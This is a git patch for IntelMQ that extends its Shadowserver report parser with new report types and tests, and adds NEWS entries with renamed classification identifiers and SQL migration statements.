From 61940147ef9c5804f4168dcd57a57cfd12053328 Mon Sep 17 00:00:00 2001
From: elsif2 <elsif@shadowserver.org>
Date: Wed, 26 Jan 2022 17:02:51 +0000
Subject: [PATCH] Update parser to support all available reports.

Update to existing test cases to match current report types.

New tests for added report types.

pycodestyle fixes

add testdata licenses

pycodestyle fix

Added reports parameter

Suggested changes to the parser

Proposed details for the release

Test script updates for suggested changes

Test input updates

Realign columns

Update compromised_website.csv

Update scan_adb.csv

Update scan_adb.csv

Update scan_ftp.csv

Update scan_ipp.csv

Update scan_snmp.csv

Realign columns

Remove duplicates

Changed malware.name to extra.infection

Updated SPDX-FileCopyrightText

shadowserver api: document and warn on old parameter

document the old parameter `country` and its status
warn if used
adapt the test

DOC: fix NEWS entry of PR#2143

Added the sector field to scan_amqp, scan_cwmp, and scan_vnc.

Copyright and raw field updates

Added the sector field to scan_amqp, scan_cwmp, and scan_vnc.

Copyright updates

Added phish_url and scan_modbus reports.

Update source.url and source.fqdn for phish_url and malware_url reports.  Update classification.taxonomy and classification.type for scan_modbus report.

* additional field type validation changes
* added count, bytes, duration, avg_pps, and max_pps fields to event_honeypot_ddos_amp
* added 'protocol.application': 'https' to scan_ssl, scan_ssl_freak, and scan_ssl_poodle
* added 'extra.tag' to scan_* and device_id

Replaced scan_modbus with scan_ics

Addeed event4_honeypot_ddos, event4_honeypot_ddos_target, scan_dvr_dhcpdiscover, and scan_socks.

Tests for event4_honeypot_ddos.

Tests for event4_honeypot_ddos_target.

Tests for scan_dvr_dhcpdiscover.

Tests for scan_socks.

Rename file

Rename file

update:scan_mdns, scan_smb, and special; add:scan_ddos_middle_box

cleanup renamed license files

updated scan_mdns test files

updated scan_smb test files

updated special test files

add scan_ddos_middlebox test files

add scan_ddos_middlebox test

updated schema

Updated scan_smb tests

Updated scan_ntp tests

Updated scan_snmp tests

New scan_docker test

New scan_kubernetes test

New scan_mysql test

Updated report schema for June 2022

Added scan_epmd test

Revert "Added scan_epmd test"

This reverts commit 01edea18d82b583290f66eae5f2457f4695623cd.

Revert: Fix for recover_line method as commited in certtools#2192

Added scan_couchdb

Test case for scan_couchdb

Added scan6_rpd

Added/updated README with maintainer details

Restored feed names and classification.identifiers to minimize upgrade impact.

Merge repair

pycodestyle repairs

codespell fixes

license compliance fixes

pycodestyle fixes

Feed configuration updates for compatibility with the original.

Added scan_postgres test

Added additional IPv6 aliases

Fix for recover_line method as commited in certtools#2192
---
 NEWS.md                                       |  126 +
 docs/user/bots.rst                            |    3 +-
 .../bots/collectors/shadowserver/README.md    |    9 +
 intelmq/bots/parsers/shadowserver/README.md   |    9 +
 intelmq/bots/parsers/shadowserver/_config.py  | 4483 ++++++++++-------
 intelmq/bots/parsers/shadowserver/parser.py   |    4 -
 intelmq/lib/test.py                           |   19 +-
 intelmq/lib/upgrades.py                       |   33 +-
 .../bots/collectors/shadowserver/README.md    |    9 +
 .../test_collector_reports_api.py             |    6 +-
 .../tests/bots/parsers/shadowserver/README.md |    6 +
 ...p.csv.license => scan_rdpeudp.csv.license} |    0
 .../parsers/shadowserver/test_blocklist.py    |    8 +-
 .../parsers/shadowserver/test_botnet_drone.py |  280 -
 .../bots/parsers/shadowserver/test_broken.py  |    8 +-
 .../shadowserver/test_caida_ip_spoofer.py     |  178 -
 .../bots/parsers/shadowserver/test_darknet.py |  104 -
 .../shadowserver/test_ddos_amplification.py   |   99 -
 .../parsers/shadowserver/test_device_id.py    |  116 +
 .../shadowserver/test_drone_brute_force.py    |   73 -
 .../test_event4_honeypot_darknet.py           |    9 +-
 .../shadowserver/test_event4_honeypot_ddos.py |  148 +
 .../test_event4_honeypot_ddos_target.py       |  150 +
 .../test_event4_honeypot_http_scan.py         |   16 +-
 .../shadowserver/test_event4_ip_spoofer.py    |   15 +-
 .../test_event4_microsoft_sinkhole.py         |   13 +-
 .../test_event4_microsoft_sinkhole_http.py    |   16 +-
 .../shadowserver/test_event4_sinkhole.py      |   54 +-
 .../shadowserver/test_event4_sinkhole_dns.py  |  127 +
 .../shadowserver/test_event4_sinkhole_http.py |   15 +-
 .../test_event4_sinkhole_http_referer.py      |   40 +-
 .../shadowserver/test_event6_sinkhole_http.py |  146 +
 .../shadowserver/test_honeypot_brute_force.py |    3 +-
 .../parsers/shadowserver/test_hp_http_scan.py |  119 -
 .../parsers/shadowserver/test_hp_ics_scan.py  |  117 -
 .../parsers/shadowserver/test_malware_url.py  |  107 +
 .../shadowserver/test_microsoft_sinkhole.py   |  333 --
 .../shadowserver/test_outdated_dnssec_key.py  |   93 -
 .../parsers/shadowserver/test_phish_url.py    |  106 +
 .../parsers/shadowserver/test_sandbox_conn.py |   99 +
 .../parsers/shadowserver/test_sandbox_dns.py  |   95 +
 .../parsers/shadowserver/test_sandbox_url.py  |  104 +
 .../parsers/shadowserver/test_scan_adb.py     |    2 +-
 .../parsers/shadowserver/test_scan_amqp.py    |  144 +
 ...ll.py => test_scan_cisco_smart_install.py} |    4 +-
 .../parsers/shadowserver/test_scan_couchdb.py |  128 +
 .../parsers/shadowserver/test_scan_db2.py     |    2 +
 .../shadowserver/test_scan_ddos_middlebox.py  |  119 +
 .../parsers/shadowserver/test_scan_docker.py  |  159 +
 .../test_scan_dvr_dhcpdiscover.py             |  179 +
 .../parsers/shadowserver/test_scan_ftp.py     |    2 +-
 .../parsers/shadowserver/test_scan_http.py    |   16 +-
 .../shadowserver/test_scan_http_vulnerable.py |   10 +-
 .../parsers/shadowserver/test_scan_ics.py     |  125 +
 .../parsers/shadowserver/test_scan_ipmi.py    |    4 -
 .../parsers/shadowserver/test_scan_isakmp.py  |   24 +-
 .../shadowserver/test_scan_kubernetes.py      |  214 +
 ...est_scan_ldap.py => test_scan_ldap_udp.py} |    8 +-
 .../parsers/shadowserver/test_scan_mdns.py    |  132 +-
 .../parsers/shadowserver/test_scan_mqtt.py    |   95 +-
 .../shadowserver/test_scan_mqtt_anon.py       |  173 +
 .../parsers/shadowserver/test_scan_mysql.py   |  258 +
 .../parsers/shadowserver/test_scan_netbios.py |  123 +
 ...is_router.py => test_scan_netis_router.py} |    4 +-
 .../parsers/shadowserver/test_scan_ntp.py     |  182 +-
 .../shadowserver/test_scan_postgres.py        |  199 +
 .../parsers/shadowserver/test_scan_quic.py    |  118 +
 .../parsers/shadowserver/test_scan_radmin.py  |    2 -
 ...scan_msrdpeudp.py => test_scan_rdpeudp.py} |    4 +-
 .../parsers/shadowserver/test_scan_smb.py     |  116 +-
 .../shadowserver/test_scan_smb_json.py        |  114 +-
 .../shadowserver/test_scan_smtp_vulnerable.py |   88 +-
 .../parsers/shadowserver/test_scan_snmp.py    |  284 +-
 .../parsers/shadowserver/test_scan_socks.py   |  107 +
 .../parsers/shadowserver/test_scan_ssdp.py    |   87 +-
 .../parsers/shadowserver/test_scan_ssh.py     |  182 +
 .../parsers/shadowserver/test_scan_ssl.py     |  218 +
 .../shadowserver/test_scan_ssl_freak.py       |    8 +-
 .../shadowserver/test_scan_ssl_poodle.py      |    4 +-
 .../shadowserver/test_scan_synfulknock.py     |  117 +
 .../shadowserver/test_sinkhole6_http.py       |  104 -
 .../parsers/shadowserver/test_sinkhole_dns.py |   91 -
 .../shadowserver/test_sinkhole_http_drone.py  |   92 -
 .../bots/parsers/shadowserver/test_special.py |  106 +
 .../shadowserver/testdata/blocklist.csv       |    8 +-
 .../shadowserver/testdata/botnet_drone.csv    |  103 -
 .../testdata/caida_ip_spoofer.csv             |    6 -
 .../testdata/compromised_website.csv          |    7 +-
 .../parsers/shadowserver/testdata/darknet.csv |  134 -
 .../testdata/ddos_amplification.csv           |    3 -
 .../shadowserver/testdata/device_id.csv       |    4 +
 .../testdata/device_id.csv.license            |    2 +
 .../testdata/drone_brute_force.csv            |    2 -
 .../testdata/event4_honeypot_ddos.csv         |    4 +
 .../testdata/event4_honeypot_ddos.csv.license |    2 +
 .../testdata/event4_honeypot_ddos_amp.csv     |   12 +-
 .../testdata/event4_honeypot_ddos_target.csv  |    4 +
 .../event4_honeypot_ddos_target.csv.license   |    2 +
 .../testdata/event4_microsoft_sinkhole.csv    |   12 +-
 .../event4_microsoft_sinkhole_http.csv        |   10 +-
 .../shadowserver/testdata/event4_sinkhole.csv |    9 +-
 .../testdata/event4_sinkhole_dns.csv          |    4 +
 .../testdata/event4_sinkhole_dns.csv.license  |    2 +
 .../testdata/event6_sinkhole_http.csv         |    4 +
 .../testdata/event6_sinkhole_http.csv.license |    2 +
 .../shadowserver/testdata/hp_http_scan.csv    |    3 -
 .../shadowserver/testdata/hp_ics_scan.csv     |    3 -
 .../shadowserver/testdata/malware_url.csv     |    4 +
 .../testdata/malware_url.csv.license          |    2 +
 .../testdata/microsoft_sinkhole.csv           |  108 -
 .../testdata/outdated_dnssec_key.csv          |    3 -
 .../shadowserver/testdata/phish_url.csv       |    4 +
 .../testdata/phish_url.csv.license            |    2 +
 .../shadowserver/testdata/sandbox_conn.csv    |    4 +
 .../testdata/sandbox_conn.csv.license         |    2 +
 .../shadowserver/testdata/sandbox_dns.csv     |    4 +
 .../testdata/sandbox_dns.csv.license          |    2 +
 .../shadowserver/testdata/sandbox_url.csv     |    4 +
 .../testdata/sandbox_url.csv.license          |    2 +
 .../shadowserver/testdata/scan_adb.csv        |    6 +-
 .../shadowserver/testdata/scan_amqp.csv       |    4 +
 .../testdata/scan_amqp.csv.license            |    2 +
 ...stall.csv => scan_cisco_smart_install.csv} |    0
 ...e => scan_cisco_smart_install.csv.license} |    0
 .../shadowserver/testdata/scan_coap.csv       |    4 +-
 .../shadowserver/testdata/scan_couchdb.csv    |    4 +
 .../testdata/scan_couchdb.csv.license         |    2 +
 .../shadowserver/testdata/scan_cwmp.csv       |    6 +-
 .../testdata/scan_ddos_middlebox.csv          |    4 +
 .../testdata/scan_ddos_middlebox.csv.license  |    2 +
 .../shadowserver/testdata/scan_docker.csv     |    4 +
 .../testdata/scan_docker.csv.license          |    2 +
 .../testdata/scan_dvr_dhcpdiscover.csv        |    4 +
 .../scan_dvr_dhcpdiscover.csv.license         |    2 +
 .../shadowserver/testdata/scan_ftp.csv        |    6 +-
 .../shadowserver/testdata/scan_ics.csv        |    4 +
 .../testdata/scan_ics.csv.license             |    2 +
 .../shadowserver/testdata/scan_ipp.csv        |    4 +-
 .../shadowserver/testdata/scan_kubernetes.csv |    4 +
 .../testdata/scan_kubernetes.csv.license      |    2 +
 .../testdata/scan_ldap.csv.license            |    2 -
 .../{scan_ldap.csv => scan_ldap_udp.csv}      |    0
 ....csv.license => scan_ldap_udp.csv.license} |    0
 .../shadowserver/testdata/scan_mdns.csv       |   98 +-
 .../testdata/scan_mdns.csv.license            |    2 +-
 .../shadowserver/testdata/scan_mqtt.csv       |    5 +-
 .../shadowserver/testdata/scan_mqtt_anon.csv  |    4 +
 .../testdata/scan_mqtt_anon.csv.license       |    2 +
 .../shadowserver/testdata/scan_mysql.csv      |    4 +
 .../testdata/scan_mysql.csv.license           |    2 +
 ...netis_router.csv => scan_netis_router.csv} |    0
 ....license => scan_netis_router.csv.license} |    0
 .../shadowserver/testdata/scan_ntp.csv        |    7 +-
 .../shadowserver/testdata/scan_postgres.csv   |    4 +
 .../testdata/scan_postgres.csv.license        |    2 +
 .../shadowserver/testdata/scan_quic.csv       |    4 +
 .../testdata/scan_quic.csv.license            |    2 +
 .../shadowserver/testdata/scan_rdp.csv        |    2 +-
 .../{scan_msrdpeudp.csv => scan_rdpeudp.csv}  |    0
 .../testdata/scan_rdpeudp.csv.license         |    2 +
 .../shadowserver/testdata/scan_smb.csv        |    7 +-
 .../testdata/scan_smb.csv.license             |    2 +-
 .../shadowserver/testdata/scan_snmp.csv       |   91 +-
 .../testdata/scan_snmp.csv.license            |    2 +-
 .../shadowserver/testdata/scan_socks.csv      |    4 +
 .../testdata/scan_socks.csv.license           |    2 +
 .../shadowserver/testdata/scan_ssdp.csv       |    5 +-
 .../shadowserver/testdata/scan_ssh.csv        |    4 +
 .../testdata/scan_ssh.csv.license             |    2 +
 .../shadowserver/testdata/scan_ssl.csv        |    4 +
 .../testdata/scan_ssl.csv.license             |    2 +
 .../shadowserver/testdata/scan_ssl_freak.csv  |   91 +-
 .../shadowserver/testdata/scan_ssl_poodle.csv |   63 +-
 .../testdata/scan_synfulknock.csv             |    4 +
 .../testdata/scan_synfulknock.csv.license     |    2 +
 .../shadowserver/testdata/scan_vnc.csv        |    6 +-
 .../shadowserver/testdata/sinkhole6_http.csv  |    4 -
 .../testdata/sinkhole6_http.csv.license       |    2 -
 .../shadowserver/testdata/sinkhole_dns.csv    |    3 -
 .../testdata/sinkhole_dns.csv.license         |    2 -
 .../testdata/sinkhole_http_drone.csv          |   87 -
 .../parsers/shadowserver/testdata/special.csv |    4 +
 .../shadowserver/testdata/special.csv.license |    2 +
 183 files changed, 7797 insertions(+), 4937 deletions(-)
 create mode 100644 intelmq/bots/collectors/shadowserver/README.md
 create mode 100644 intelmq/bots/parsers/shadowserver/README.md
 create mode 100644 intelmq/tests/bots/collectors/shadowserver/README.md
 rename intelmq/tests/bots/parsers/shadowserver/{testdata/scan_msrdpeudp.csv.license => scan_rdpeudp.csv.license} (100%)
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_botnet_drone.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_caida_ip_spoofer.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_darknet.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_ddos_amplification.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_device_id.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_drone_brute_force.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_ddos.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_ddos_target.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_dns.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_event6_sinkhole_http.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_hp_http_scan.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_hp_ics_scan.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_malware_url.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_microsoft_sinkhole.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_outdated_dnssec_key.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_phish_url.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_sandbox_conn.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_sandbox_dns.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_sandbox_url.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_amqp.py
 rename intelmq/tests/bots/parsers/shadowserver/{test_cisco_smart_install.py => test_scan_cisco_smart_install.py} (94%)
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_couchdb.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_ddos_middlebox.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_docker.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_dvr_dhcpdiscover.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_ics.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_kubernetes.py
 rename intelmq/tests/bots/parsers/shadowserver/{test_scan_ldap.py => test_scan_ldap_udp.py} (97%)
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_mqtt_anon.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_mysql.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_netbios.py
 rename intelmq/tests/bots/parsers/shadowserver/{test_netis_router.py => test_scan_netis_router.py} (91%)
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_postgres.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_quic.py
 rename intelmq/tests/bots/parsers/shadowserver/{test_scan_msrdpeudp.py => test_scan_rdpeudp.py} (96%)
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_socks.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_ssh.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_ssl.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_scan_synfulknock.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_sinkhole6_http.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_sinkhole_dns.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/test_sinkhole_http_drone.py
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/test_special.py
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/botnet_drone.csv
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/caida_ip_spoofer.csv
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/darknet.csv
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/ddos_amplification.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/device_id.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/device_id.csv.license
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/drone_brute_force.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_target.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_target.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole_dns.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole_dns.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/event6_sinkhole_http.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/event6_sinkhole_http.csv.license
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/hp_http_scan.csv
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/hp_ics_scan.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/malware_url.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/malware_url.csv.license
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/microsoft_sinkhole.csv
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/outdated_dnssec_key.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/phish_url.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/phish_url.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_conn.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_conn.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_dns.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_dns.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_url.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_url.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_amqp.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_amqp.csv.license
 rename intelmq/tests/bots/parsers/shadowserver/testdata/{cisco_smart_install.csv => scan_cisco_smart_install.csv} (100%)
 rename intelmq/tests/bots/parsers/shadowserver/testdata/{cisco_smart_install.csv.license => scan_cisco_smart_install.csv.license} (100%)
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_couchdb.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_couchdb.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_ddos_middlebox.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_ddos_middlebox.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_docker.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_docker.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_dvr_dhcpdiscover.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_dvr_dhcpdiscover.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_ics.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_ics.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_kubernetes.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_kubernetes.csv.license
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap.csv.license
 rename intelmq/tests/bots/parsers/shadowserver/testdata/{scan_ldap.csv => scan_ldap_udp.csv} (100%)
 rename intelmq/tests/bots/parsers/shadowserver/testdata/{microsoft_sinkhole.csv.license => scan_ldap_udp.csv.license} (100%)
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt_anon.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt_anon.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_mysql.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_mysql.csv.license
 rename intelmq/tests/bots/parsers/shadowserver/testdata/{netis_router.csv => scan_netis_router.csv} (100%)
 rename intelmq/tests/bots/parsers/shadowserver/testdata/{netis_router.csv.license => scan_netis_router.csv.license} (100%)
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_postgres.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_postgres.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_quic.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_quic.csv.license
 rename intelmq/tests/bots/parsers/shadowserver/testdata/{scan_msrdpeudp.csv => scan_rdpeudp.csv} (100%)
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdpeudp.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_socks.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_socks.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssh.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssh.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl.csv.license
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_synfulknock.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/scan_synfulknock.csv.license
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole6_http.csv
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole6_http.csv.license
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_dns.csv
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_dns.csv.license
 delete mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_http_drone.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/special.csv
 create mode 100644 intelmq/tests/bots/parsers/shadowserver/testdata/special.csv.license

diff --git a/NEWS.md b/NEWS.md
index 9fb00620e..c8761bfcc 100644
--- a/NEWS.md
+++ b/NEWS.md
@@ -9,11 +9,53 @@ NEWS
 This file lists all changes which have an affect on the administration of IntelMQ and contains steps that you need to be aware off for the upgrade.
 Please refer to the changelog for a full list of changes.
 
+
 3.1.0 Feature release (unreleased)
 ----------------------------------
 
 ### Requirements
 
+### Bots
+#### ShadowServer Reports API collector
+The misleading `country` parameter has been depreciated and a `reports` parameter has been added.
+The backwards-compatibility will be removed in IntelMQ version 4.0.0.
+See the [Shadowserver Reports API bot's documentation](https://intelmq.readthedocs.io/en/latest/user/bots.html#shadowserver-reports-api).
+
+#### ShadowServer parser
+Previously, mappings used a mix of `extra.naics` and `extra.source.naics`. The parser has been updated to use the more specific term (`extra.source.naics`).
+
+A number of the _classification.identifier_ values have been updated to follow a common naming convention based on their canonical report name:
+
+| before IntelMQ 3.1.0 | in IntelMQ 3.1.0 and higher |
+| --- | --- |
+| accessible-adb | open-adb |
+| accessible-afp | open-afp |
+| accessible-amqp | open-amqp |
+| accessible-ard | open-ard |
+| accessible-cisco-smart-install | open-cisco-smart-install |
+| accessible-coap | open-coap |
+| accessible-ftp | open-ftp |
+| accessible-hadoop | open-hadoop |
+| accessible-http | open-http |
+| accessible-msrdpeudp | open-rdpeudp |
+| accessible-radmin | open-radmin |
+| accessible-rsync | open-rsync |
+| accessible-ubiquiti-discovery-service | open-ubiquiti |
+| amplification-ddos-victim | honeypot-ddos-amp |
+| blacklisted-ip | blocklist |
+| dns-open-resolver | open-dns |
+| honeypot-http-scan | honeypot-http-scan |
+| ics | honeypot-ics-scan |
+| ntp-monitor | open-ntpmonitor |
+| ntp-version | open-ntp |
+| open-db2-discovery-service | open-db2 |
+| open-ike | open-isakmp |
+| open-ldap | open-ldap-tcp |
+| open-natpmp | open-nat-pmp |
+| open-netbios-nameservice | open-netbios |
+| open-netis | open-netis-router |
+| sinkholedns | sinkhole-dns |
+
 ### Tools
 
 ### Data Format
@@ -37,6 +79,90 @@ The parameter `timeout` has been merged into `redis_cache_ttl`.
 ### Libraries
 
 ### Postgres databases
+The following statements optionally update existing data for the harmonization classification changes:
+```sql
+UPDATE events
+   SET "classification.identifier" = 'open-adb'
+   WHERE "classification.identifier" = 'accessible-adb';
+UPDATE events
+   SET "classification.identifier" = 'open-afp'
+   WHERE "classification.identifier" = 'accessible-afp';
+UPDATE events
+   SET "classification.identifier" = 'open-amqp'
+   WHERE "classification.identifier" = 'accessible-amqp';
+UPDATE events
+   SET "classification.identifier" = 'open-ard'
+   WHERE "classification.identifier" = 'accessible-ard';
+UPDATE events
+   SET "classification.identifier" = 'open-cisco-smart-install'
+   WHERE "classification.identifier" = 'accessible-cisco-smart-install';
+UPDATE events
+   SET "classification.identifier" = 'open-coap'
+   WHERE "classification.identifier" = 'accessible-coap';
+UPDATE events
+   SET "classification.identifier" = 'open-ftp'
+   WHERE "classification.identifier" = 'accessible-ftp';
+UPDATE events
+   SET "classification.identifier" = 'open-hadoop'
+   WHERE "classification.identifier" = 'accessible-hadoop';
+UPDATE events
+   SET "classification.identifier" = 'open-http'
+   WHERE "classification.identifier" = 'accessible-http';
+UPDATE events
+   SET "classification.identifier" = 'open-rdpeudp'
+   WHERE "classification.identifier" = 'accessible-msrdpeudp';
+UPDATE events
+   SET "classification.identifier" = 'open-radmin'
+   WHERE "classification.identifier" = 'accessible-radmin';
+UPDATE events
+   SET "classification.identifier" = 'open-rsync'
+   WHERE "classification.identifier" = 'accessible-rsync';
+UPDATE events
+   SET "classification.identifier" = 'open-ubiquiti'
+   WHERE "classification.identifier" = 'accessible-ubiquiti-discovery-service';
+UPDATE events
+   SET "classification.identifier" = 'honeypot-ddos-amp'
+   WHERE "classification.identifier" = 'amplification-ddos-victim';
+UPDATE events
+   SET "classification.identifier" = 'blocklist'
+   WHERE "classification.identifier" = 'blacklisted-ip';
+UPDATE events
+   SET "classification.identifier" = 'open-dns'
+   WHERE "classification.identifier" = 'dns-open-resolver';
+UPDATE events
+   SET "classification.identifier" = 'honeypot-http-scan'
+   WHERE "classification.identifier" = 'honeypot-http-scan';
+UPDATE events
+   SET "classification.identifier" = 'honeypot-ics-scan'
+   WHERE "classification.identifier" = 'ics';
+UPDATE events
+   SET "classification.identifier" = 'open-ntpmonitor'
+   WHERE "classification.identifier" = 'ntp-monitor';
+UPDATE events
+   SET "classification.identifier" = 'open-ntp'
+   WHERE "classification.identifier" = 'ntp-version';
+UPDATE events
+   SET "classification.identifier" = 'open-db2'
+   WHERE "classification.identifier" = 'open-db2-discovery-service';
+UPDATE events
+   SET "classification.identifier" = 'open-isakmp'
+   WHERE "classification.identifier" = 'open-ike';
+UPDATE events
+   SET "classification.identifier" = 'open-ldap-tcp'
+   WHERE "classification.identifier" = 'open-ldap';
+UPDATE events
+   SET "classification.identifier" = 'open-nat-pmp'
+   WHERE "classification.identifier" = 'open-natpmp';
+UPDATE events
+   SET "classification.identifier" = 'open-netbios'
+   WHERE "classification.identifier" = 'open-netbios-nameservice';
+UPDATE events
+   SET "classification.identifier" = 'open-netis-router'
+   WHERE "classification.identifier" = 'open-netis';
+UPDATE events
+   SET "classification.identifier" = 'sinkhole-dns'
+   WHERE "classification.identifier" = 'sinkholedns';
+```
 
 
 ### Bots
diff --git a/docs/user/bots.rst b/docs/user/bots.rst
index 3091fa956..d4a96c0fc 100644
--- a/docs/user/bots.rst
+++ b/docs/user/bots.rst
@@ -654,9 +654,10 @@ The Cache is required to memorize which files have already been processed (TTL n
 
 **Configuration Parameters**
 
-* `country`: The country you want to download the reports for
+* `country`: **Deprecated:** The country you want to download the reports for. Will be removed in IntelMQ version 4.0.0, use *reports* instead.
 * `apikey`: Your Shadowserver API key
 * `secret`: Your Shadowserver API secret
+* `reports`: A list of strings or a comma-separated list of the mailing lists you want to process.
